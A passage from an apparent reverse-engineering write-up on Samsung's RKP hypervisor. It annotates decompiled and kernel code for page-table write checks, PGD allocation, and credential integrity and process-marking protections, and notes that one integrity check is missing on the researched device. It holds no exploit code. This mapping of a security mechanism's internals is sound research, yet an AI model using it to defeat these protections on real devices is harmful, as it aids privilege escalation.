// Mapping a block is not allowed, trigger a policy violation.
rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
}
// The new descriptor is a table, call `rkp_l2pgt_process_table` to process the new PMD.
res = rkp_l2pgt_process_table(pud_new & 0xfffffffff000, addr, 1 /* alloc */);
// For user PUD, set the PXN bit of the PUD descriptor.
if (!is_kernel) {
set_pxn_bit_of_desc(&pud_new, 1);
}
// ...
}
if (res) {
uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
// Finally, perform the write of the PUD descriptor on behalf of the kernel.
set_entry_of_pgt(pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
rkp_l2pgt_write
handles writes to second level tables (or PMDs). It first ensures the PMD is marked as L2
in the physmap. It then processes the old and new descriptor values using the check_single_l2e
function. If the old or the new descriptor maps protected memory, the write is disallowed. Finally, if both checks pass, the new descriptor value is written.
uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
// ...
// Convert the PMD descriptor PA into a VA.
pmdp_pa = rkp_get_pa(pmdp);
// Get the old/current value of the PMD descriptor.
pmd_old = *pmdp_pa;
rkp_phys_map_lock(pmdp_pa);
// Ensure the PMD is marked as such in the physmap.
if (!is_phys_map_l2(pmdp_pa)) {
// If RKP is deferred initialized, continue with the processing.
if (rkp_deferred_inited) {
uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
}
// Otherwise, perform the write.
else {
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
is_flag3 = is_phys_map_flag3(pmdp_pa);
// Check if this is a kernel or user PMD using the physmap.
is_kernel = is_phys_map_kernel(pmdp_pa);
// Get the start VA corresponding to the kernel or user page tables.
start_addr = 0xffffff8000000000;
if (!is_kernel) {
start_addr = 0;
}
// Get the VA mapped by the PMD descriptor.
addr = (pmdp_pa << 18) & 0x3fe00000 | ((is_flag3 & 0x1ff) << 30) | start_addr;
// If the old descriptor was valid.
if (pmd_old) {
// Call `check_single_l2e` to check the next level.
res = check_single_l2e(pmdp_pa, addr, 0 /* free */);
// If the old descriptor maps protected memory, do not perform the write.
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
// If the new descriptor is valid.
if (pmd_new) {
// Call `check_single_l2e` to check the next level.
res = check_single_l2e(&pmd_new, addr, 1 /* alloc */);
// If the new descriptor maps protected memory, do not perform the write.
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
// ...
}
// Finally, perform the write of the PMD descriptor on behalf of the kernel.
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
rkp_l3pgt_write
handles writes to third level tables (or PTs). There is a special case if the descriptor maps virtual memory right before the kernel text section, in which case its PXN bit is set and the write is performed. Otherwise, the write is allowed if the PT is mapped as L3
or as FREE
in the physmap and either the new descriptor is not a page descriptor, or its PXN bit is set, or RKP is not deferred initialized.
int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
// ...
// Convert the PT descriptor PA into a VA.
ptep_pa = rkp_get_pa(ptep);
rkp_phys_map_lock(ptep_pa);
// If the PT is marked as such in the physmap, or as `FREE`.
if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
// If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
allowed = 1;
}
// Otherwise, the check fails if RKP is deferred initialized.
else {
allowed = rkp_deferred_inited == 0;
}
}
// If the PT is marked as something else, the check also fails.
else {
allowed = 0;
}
rkp_phys_map_unlock(ptep_pa);
cs_enter(&l3pgt_lock);
// In the special case where the descriptor is in the same page as the descriptor that maps the start of the kernel
// text section and maps memory that is before the start of the kernel text section.
if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xfff) {
// Set the PXN bit of the new descriptor value.
if (pte_val) {
pte_val |= (1 << 53);
}
cs_exit(&l3pgt_lock);
// And perform the write on behalf of the kernel.
return set_entry_of_pgt(ptep_pa, pte_val);
}
cs_exit(&l3pgt_lock);
// If the check failed, trigger a policy violation.
if (!allowed) {
pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
}
// Otherwise, perform the write of the PT descriptor on behalf of the kernel.
return set_entry_of_pgt(ptep_pa, pte_val);
}
In addition to modifying the descriptors contained in the PUDs, PMDs, and PTs, the kernel also needs to allocate, and sometimes free, PGDs.
On the kernel side, the allocation of a PGD is done by the pgd_alloc
function. It calls rkp_ro_alloc
to get a read-only page from the hypervisor and then invokes the RKP_NEW_PGD
command to notify RKP that this page will be a PGD.
pgd_t *pgd_alloc(struct mm_struct *mm)
{
// ...
pgd_t *ret = NULL;
ret = (pgd_t *) rkp_ro_alloc();
if (!ret) {
if (PGD_SIZE == PAGE_SIZE)
ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
else
ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
}
if(unlikely(!ret)) {
pr_warn("%s: pgd alloc is failed\n", __func__);
return ret;
}
uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);
return ret;
// ...
}
The freeing of a PGD is done by the pgd_free
function. It invokes the RKP_FREE_PGD
command to notify RKP that this page will no longer be a PGD and then calls rkp_ro_free
to relinquish the page to the hypervisor.
void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
// ...
uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);
/* if pgd memory come from read only buffer, the put it back */
/*TODO: use a macro*/
if (is_rkp_ro_page((u64)pgd))
rkp_ro_free((void *)pgd);
else {
if (PGD_SIZE == PAGE_SIZE)
free_page((unsigned long)pgd);
else
kmem_cache_free(pgd_cache, pgd);
}
// ...
}
On the hypervisor side, the rkp_cmd_new_pgd
function ends up calling rkp_l1pgt_new_pgd
after incrementing a counter. This function disallows allocating swapper_pg_dir
, idmap_pg_dir
, or tramp_pg_dir
. If RKP is initialized, it calls rkp_l1pgt_process_table
to process the new PGD (that is assumed to be a user PGD).
void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
// ...
// Convert the PGD VA into a PA.
pgdp = rkp_get_pa(regs->x2) & 0xfffffffffffff000;
// The allocated PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
}
// If RKP is initialized, process the new PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
else if (rkp_inited) {
if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 1 /* alloc */) < 0) {
uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
}
The rkp_cmd_free_pgd
function ends up calling rkp_l1pgt_free_pgd
after incrementing a counter. This function disallows freeing swapper_pg_dir
, idmap_pg_dir
, or tramp_pg_dir
. If RKP is initialized, it calls rkp_l1pgt_process_table
to process the old PGD, unless it is the currently active user or kernel PGD, in which case an error is raised and the hypervisor panics.
void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
// ...
// Convert the PGD VA into a PA.
pgd_pa = rkp_get_pa(regs->x2);
pgdp = pgd_pa & 0xfffffffffffff000;
// The freed PGD can't be `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`, or we trigger a policy violation.
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
ID_MAP_PGD);
rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
}
// If RKP is initialized, process the old PGD by calling `rkp_l1pgt_process_table`. If not, do nothing.
else if (rkp_inited) {
// Unless this is the active user or kernel PGD (retrieved by checking the system register TTBRn_EL1 value).
if ((get_ttbr0_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000) ||
(get_ttbr1_el1() & 0xffffffffffff) == (pgd_pa & 0xfffffffff000)) {
uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
get_ttbr0_el1(), get_ttbr1_el1());
}
if (rkp_l1pgt_process_table(pgdp, 0 /* user */, 0 /* free */) < 0) {
uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
}
In the Protecting Kernel Data section, we have seen that the cred
and task_security_struct
structures are now allocated on read-only pages provided by the hypervisor. Thus, they can no longer be modified directly by the kernel. In addition, new fields are added to these structures for Data Flow Integrity (DFI) purposes. In particular, each structure now gets a "back-pointer", i.e. a pointer to the owning structure:
task_struct
for the cred
structure;cred
for the task_security_struct
structure.The cred
structure also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the cred
structure of another task_struct
(in particular, one might try to reuse the init
task credentials).
struct cred {
// ...
atomic_t *use_cnt;
struct task_struct *bp_task;
void *bp_pgd;
unsigned long long type;
} __randomize_layout;
struct task_security_struct {
// ...
void *bp_cred;
};
These back-pointers and values are verified when a SELinux hook is executed via a call to security_integrity_current
. On our research device, the call to this function is missing, so in this section we will take a look at the source code of a different Samsung device that has it.
The kernel macros call_void_hook
and call_int_hook
contain the calls to security_integrity_current
.
#define call_void_hook(FUNC, ...) \
do { \
struct security_hook_list *P; \
\
if(security_integrity_current()) break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) \
P->hook.FUNC(__VA_ARGS__); \
} while (0)
#define call_int_hook(FUNC, IRC, ...) ({ \
int RC = IRC; \
do { \
struct security_hook_list *P; \
\
RC = security_integrity_current(); \
if (RC != 0) \
break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
RC = P->hook.FUNC(__VA_ARGS__); \
if (RC != 0) \
break; \
} \
} while (0); \
RC; \
})
security_integrity_current
first calls rkp_is_valid_cred_sp
to verify that the credentials and security structures are allocated from a hypervisor-protected page. It then calls cmp_sec_integrity
to verify the credentials' integrity, and cmp_ns_integrity
to verify the mount namespace's integrity.
int security_integrity_current(void)
{
rcu_read_lock();
if ( rkp_cred_enable &&
(rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
cmp_sec_integrity(current_cred(),current->mm)||
cmp_ns_integrity())) {
rkp_print_debug();
rcu_read_unlock();
panic("RKP CRED PROTECTION VIOLATION\n");
}
rcu_read_unlock();
return 0;
}
rkp_is_valid_cred_sp
ensures that the credentials and security structures are protected by the hypervisor. init_cred
and init_sec
form a valid pair. For other pairs, the start and end of the structures must be located in a read-only page that has been allocated by the hypervisor. In addition, the back-pointer of the task_security_struct
must be the correct cred
structure.
extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
struct task_security_struct *tsec = (struct task_security_struct *)sp;
if((cred == (u64)&init_cred) &&
( sp == (u64)&init_sec)){
return 0;
}
if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
(!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
return 1;
}
if((u64)tsec->bp_cred != cred) {
return 1;
}
return 0;
}
cmp_sec_integrity
checks that the back-pointer of the cred
is the current task_struct
, and that both the PGD pointer of the cred
and the current memory descriptor point to the same PGD that must not be swapper_pg_dir
.
static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
return ((cred->bp_task != current) ||
(mm && (!( in_interrupt() || in_softirq())) &&
(cred->bp_pgd != swapper_pg_dir) &&
(mm->pgd != cred->bp_pgd)));
}
In order to be able to modify the cred
structure of processes on behalf of the kernel and to perform verifications on the values of its fields, the hypervisor needs to be aware of its layout and of the layout of the task_struct
structure.
On the kernel side, the function that does that is kdp_init
. It invokes the RKP_KDP_X40
command with the offsets needed by RKP and, in addition, the virtual addresses of the verifiedbootstate
and ss_initialized
global variables.
void kdp_init(void)
{
kdp_init_t cred;
cred.credSize = sizeof(struct cred);
cred.sp_size = rkp_get_task_sec_size();
cred.pgd_mm = offsetof(struct mm_struct,pgd);
cred.uid_cred = offsetof(struct cred,uid);
cred.euid_cred = offsetof(struct cred,euid);
cred.gid_cred = offsetof(struct cred,gid);
cred.egid_cred = offsetof(struct cred,egid);
cred.bp_pgd_cred = offsetof(struct cred,bp_pgd);
cred.bp_task_cred = offsetof(struct cred,bp_task);
cred.type_cred = offsetof(struct cred,type);
cred.security_cred = offsetof(struct cred,security);
cred.usage_cred = offsetof(struct cred,use_cnt);
cred.cred_task = offsetof(struct task_struct,cred);
cred.mm_task = offsetof(struct task_struct,mm);
cred.pid_task = offsetof(struct task_struct,pid);
cred.rp_task = offsetof(struct task_struct,real_parent);
cred.comm_task = offsetof(struct task_struct,comm);
cred.bp_cred_secptr = rkp_get_offset_bp_cred();
cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
cred.selinux.ss_initialized_va = (u64)&ss_initialized;
#endif
uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}
The first function called by kdp_init
, rkp_get_task_sec_size
, simply returns the size of the task_security_struct
structure.
unsigned int rkp_get_task_sec_size(void)
{
return sizeof(struct task_security_struct);
}
And the second function, rkp_get_offset_bp_cred
, returns the offset of its bp_cred
(back-pointer to credentials) field.
unsigned int rkp_get_offset_bp_cred(void)
{
return offsetof(struct task_security_struct,bp_cred);
}
The cred_init
function is called from the start_kernel
function.
asmlinkage __visible void __init start_kernel(void)
{
// ...
cred_init();
// ...
}
On the hypervisor side, the command is handled by rkp_cmd_cred_init
, which calls rkp_cred_init
.
rkp_cred_init
allocates the rkp_cred
structure, extracts and sanity-checks the various offsets provided by the kernel, and stores them into this structure. It also stores if the device is unlocked and the physical address of the variable denoting whether SELinux is initialized.
void rkp_cred_init(saved_regs_t* regs) {
// ...
// Allocate the `rkp_cred` structure that will hold all the offsets.
rkp_cred = malloc(0xf0, 0);
// Convert the VA of the kernel argument structure to a PA.
cred = rkp_get_pa(regs->x2);
// Ensure we're not calling this function multiple times.
if (cred_inited == 1) {
uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
return;
}
// Extract the various fields of the kernel-provided structure.
cred_inited = 1;
credSize = cred->credSize;
sp_size = cred->sp_size;
uid_cred = cred->uid_cred;
euid_cred = cred->euid_cred;
gid_cred = cred->gid_cred;
egid_cred = cred->egid_cred;
usage_cred = cred->usage_cred;
bp_pgd_cred = cred->bp_pgd_cred;
bp_task_cred = cred->bp_task_cred;
type_cred = cred->type_cred;
security_cred = cred->security_cred;
bp_cred_secptr = cred->bp_cred_secptr;
// Ensure the offsets within a structure are not bigger than the structure total size.
if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
security_cred > credSize || bp_cred_secptr > sp_size) {
uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
return;
}
// Store the various fields into the corresponding global variables.
rkp_cred->CRED_SIZE = cred->credSize;
rkp_cred->SP_SIZE = sp_size;
rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
rkp_cred->CRED_USE_CNT = usage_cred >> 3;
rkp_cred->VERIFIED_BOOT_STATE = 0;
// Convert the VB state VA to a PA, and store the device unlock state in a global variable.
vbs_va = cred->verifiedbootstate;
if (vbs_va) {
vbs_pa = check_and_convert_kernel_input(vbs_va);
if (vbs_pa != 0) {
rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
}
}
rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
// For `ss_initialized`, convert the VA to a PA and store it into a global variable.
rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}
When the kernel needs to set the PGD of a task_struct
, it calls into the hypervisor, which also updates the the task cred
structure's back-pointer.
On the kernel side, the change of a task PGD can happen in two places. The first one is exec_mmap
, which invokes the RKP_KDP_X43
command.
static int exec_mmap(struct mm_struct *mm)
{
// ...
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
}
// ...
}
The second one is the rkp_assign_pgd
function, which invokes the same command.
void rkp_assign_pgd(struct task_struct *p)
{
u64 pgd;
pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);
uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}
rkp_assign_pgd
is called from copy_process
, which is when a process is being copied.
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
// ...
if(rkp_cred_enable)
rkp_assign_pgd(p);
// ...
}
On the hypervisor side, the command is handled by rkp_cmd_pgd_assign
, which simply calls rkp_pgd_assign
.
rkp_pgd_assign
calls rkp_phys_map_verify_cred
to ensure the kernel-provided structure is a legitimate cred
structure before writing the new value of the bp_pgd
field of the cred
structure.
void rkp_pgd_assign(saved_regs_t* regs) {
// ...
// Convert the VA of the cred structure into a PA.
cred = rkp_get_pa(regs->x2);
// The new PGD of the task is in register x3.
pgd = regs->x3;
// Verify that the credentials are valid and hypervisor-protected.
if (rkp_phys_map_verify_cred(cred)) {
uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !! %lx %lx %lx", cred, regs->x2, pgd);
return;
}
// Update the pgd field of the cred structure if the check passed.
*(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}
rkp_phys_map_verify_cred
verifies that the pointer is aligned on the size of the cred
structure and marked as CRED
in the physmap.
int64_t rkp_phys_map_verify_cred(uint64_t cred) {
// ...
// The credentials pointer must not be NULL.
if (!cred) {
return 1;
}
// It must be aligned on its expected size.
if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE) {
return 1;
}
rkp_phys_map_lock(cred);
// It must be marked as `CRED` in the physmap.
if (is_phys_map_cred(cred)) {
uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
rkp_phys_map_unlock(cred);
return 1;
}
rkp_phys_map_unlock(cred);
return 0;
}
Similarly to a change in the task PGD, the kernel also calls into the hypervisor to change the security
field of a cred
structure.
On the kernel side, this is the case when the cred
structure is being freed by the selinux_cred_free
function. It invokes the RKP_KDP_X45
command but also calls rkp_free_security
to free the task_security_struct
structure.
static void selinux_cred_free(struct cred *cred)
{
// ...
if (rkp_ro_page((unsigned long)cred)) {
uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
}
// ...
rkp_free_security((unsigned long)tsec);
// ...
}
rkp_free_security
first calls chk_invalid_kern_ptr
to check if the pointer given as an argument is a valid kernel pointer. If then calls rkp_ro_page
and rkp_from_tsec_jar
to ensure it was allocated from the hypervisor-protected cache, before calling kmem_cache_free
(or kfree
if it wasn't).
void rkp_free_security(unsigned long tsec)
{
if(!tsec ||
chk_invalid_kern_ptr(tsec))
return;
if(rkp_ro_page(tsec) &&
rkp_from_tsec_jar(tsec)){
kmem_cache_free(tsec_jar,(void *)tsec);
}
else {
kfree((void *)tsec);
}
}
chk_invalid_kern_ptr
checks if the pointer starts with 0xffffffc.
int chk_invalid_kern_ptr(u64 tsec)
{
return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}
rkp_ro_page
calls rkp_is_pg_protected
, unless the address to check is init_cred
or init_sec
.
static inline u8 rkp_ro_page(unsigned long addr)
{
if(!rkp_cred_enable)
return (u8)0;
if((addr == ((unsigned long)&init_cred)) ||
(addr == ((unsigned long)&init_sec)))
return (u8)1;
else
return rkp_is_pg_protected(addr);
}
Finally, rkp_from_tsec_jar
gets the head page from the object, then the slab cache, and returns if it is the tsec_jar
cache.
int rkp_from_tsec_jar(unsigned long addr)
{
static void *objp;
static struct kmem_cache *s;
static struct page *page;
objp = (void *)addr;
if(!objp)
return 0;
page = virt_to_head_page(objp);
s = page->slab_cache;
if(s && s->name) {
if(!strcmp(s->name,"tsec_jar")) {
return 1;
}
}
return 0;
}
On the hypervisor side, the command is handled by rkp_cmd_cred_set_security
, which calls rkp_cred_set_security
.
rkp_cred_set_security
gets the cred
structure from the pointer to its security
field that was given as an argument. It ensures it is marked as CRED
in the physmap before setting the security
field to a poison value.
int64_t* rkp_cred_set_security(saved_regs_t* regs) {
// ...
// Get the beginning of the cred structure from the pointer to its security field, and convert the VA into a PA.
cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
// Ensure the cred structure is marked as `CRED` in the physmap.
if (is_phys_map_cred(cred)) {
return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
}
// Convert the VA of the security field to a PA.
security = rkp_get_pa(regs->x2);
// Set the security field to the poison value 7 (remember that we are freeing the cred structure).
*security = 7;
return security;
}
Before delving into the credentials change, we must first explain the hypervisor's process marking.
On the kernel side, it happens in the handler of the execve
system call. It will invoke the RKP_KDP_X4B
command, giving it the path of the binary being executed, to detect any violations. In addition, if the current task is root, as checked with the CHECK_ROOT_UID
macro, and the checking of restrictions on the binary being executed by the rkp_restrict_fork
function fails, the system call returns immediately.
SYSCALL_DEFINE3(execve,
const char __user *, filename,
const char __user *const __user *, argv,
const char __user *const __user *, envp)
{
struct filename *path = getname(filename);
int error = PTR_ERR(path);
if(IS_ERR(path))
return error;
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
}
if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
if(rkp_restrict_fork(path)){
pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
"PPID = %d(%s)\n",
current->pid, current->comm,
current->parent->pid, current->parent->comm);
putname(path);
return -EACCES;
}
}
putname(path);
return do_execve(getname(filename), argv, envp);
}
The CHECK_ROOT_UID
macro returns if any of the UID, GID, EUID, EGID, SUID, or SGID is zero.
#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
x->cred->suid.val == 0 || x->cred->sgid.val == 0)
The rkp_restrict_fork
function ignores the /system/bin/patchoat
and /system/bin/idmap2
binaries. It also ignores processes marked as "Linux on Dex", as checked by the rkp_is_lod
macro. For processes marked as "non root", checked by the rkp_is_nonroot
macro, the credentials are changed to the shell
user credentials (that is, UID and GID 2000).
static int rkp_restrict_fork(struct filename *path)
{
struct cred *shellcred;
if (!strcmp(path->name, "/system/bin/patchoat") ||
!strcmp(path->name, "/system/bin/idmap2")) {
return 0;
}
/* If the Process is from Linux on Dex,
then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
if(rkp_is_lod(current)){
return 0;
}
#endif
if(rkp_is_nonroot(current)){
shellcred = prepare_creds();
if (!shellcred) {
return 1;
}
shellcred->uid.val = 2000;
shellcred->gid.val = 2000;
shellcred->euid.val = 2000;
shellcred->egid.val = 2000;
commit_creds(shellcred);
}
return 0;
}
The rkp_is_nonroot
macro checks if bit 1 of the type
field of the cred
structure is set.
#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)
The rkp_is_lod
macro checks if bit 3 of the type
field of the cred
structure is set.
#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)
Now we will take a look at the hypervisor side of the process marking to see when these two bits are set.
On the hypervisor side, the command in execve
is handled by rkp_cmd_mark_ppt
, which calls rkp_mark_ppt
.
rkp_mark_ppt
does some sanity checking on the current task_struct
and its cred
structure, and then changes the bits of the type
field:
CRED_FLAG_MARK_PPT
(bit 2) for adbd
, app_process32
and app_process64
;CRED_FLAG_LOD
(bit 3) for nst
;CRED_FLAG_CHILD_PPT
(bit 1) for idmap2
and patchoat
.void rkp_mark_ppt(saved_regs_t* regs) {
// ...
// Get the current task_struct in the kernel.
current_va = rkp_ns_get_current();
// Convert the current task_struct VA into a PA.
current_pa = rkp_get_pa(current_va);
// Get the current cred structure from the current task_struct.
current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
// Get the binary path given as argument in register x2.
name_va = regs->x2;
// Convert the binary path VA into a PA.
name_pa = rkp_get_pa(name_va);
// Sanity-check: the values must be non NULL and the current cred must be marked as `CRED` in the physmap.
if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
}
// adbd, app_process32 and app_process64 are marked as `CRED_FLAG_MARK_PPT` (4).
if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
!strcmp(name_pa, "/system/bin/app_process64")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
}
// nst is marked as `CRED_FLAG_LOD` (8, checked by `rkp_is_lod`).
if (!strcmp(name_pa, "/system/bin/nst")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
}
// idmap2 is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
if (!strcmp(name_pa, "/system/bin/idmap2")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}
// patchoat is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
if (!strcmp(name_pa, "/system/bin/patchoat")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}
}
When the kernel needs to change the credentials of a task, it calls into the hypervisor, which does some extensive checking to detect privilege escalation attempts. Before digging into the hypervisor side, let's see how a cred
structure is assigned to a task_struct
.
cred
structures are allocated from three places. The first one is the copy_creds
function. In addition to a comment stating the credentials are no longer shared among the same thread group, we can see that the return value of the prepare_ro_creds
function is assigned to the cred
field of the task_struct
.
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
// ...
/*
* Disabling cred sharing among the same thread group. This
* is needed because we only added one back pointer in cred.
*
* This should NOT in any way change kernel logic, if we think about what
* happens when a thread needs to change its credentials: it will just
* create a new one, while all other threads in the same thread group still
* reference the old one, whose reference counter decreases by 2.
*/
// ...
if(rkp_cred_enable){
p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
put_cred(new);
}
// ...
}
The second place is the commit_creds
function. It ensures that the new credentials are protected by the hypervisor by calling rkp_ro_page
, before also assigning to the cred
of the current task_struct
the return value of the prepare_ro_creds
function.
int commit_creds(struct cred *new)
{
if (rkp_ro_page((unsigned long)new))
BUG_ON((rocred_uc_read(new)) < 1);
else
// ...
if(rkp_cred_enable) {
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);
rcu_assign_pointer(task->real_cred, new_ro);
rcu_assign_pointer(task->cred, new_ro);
}
else {
// ...
}
// ...
if (rkp_cred_enable){
put_cred(new);
put_cred(new);
}
// ...
}
The third place is the override_creds
function. Yet again, we can see another call to prepare_ro_creds
before assigning the return value to the cred
field of the current task_struct
.
#define override_creds(x) rkp_override_creds(&x)
const struct cred *rkp_override_creds(struct cred **cnew)
{
// ...
struct cred *new = *cnew;
// ...
if(rkp_cred_enable) {
volatile unsigned int rkp_use_count = rkp_get_usecount(new);
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
*cnew = new_ro;
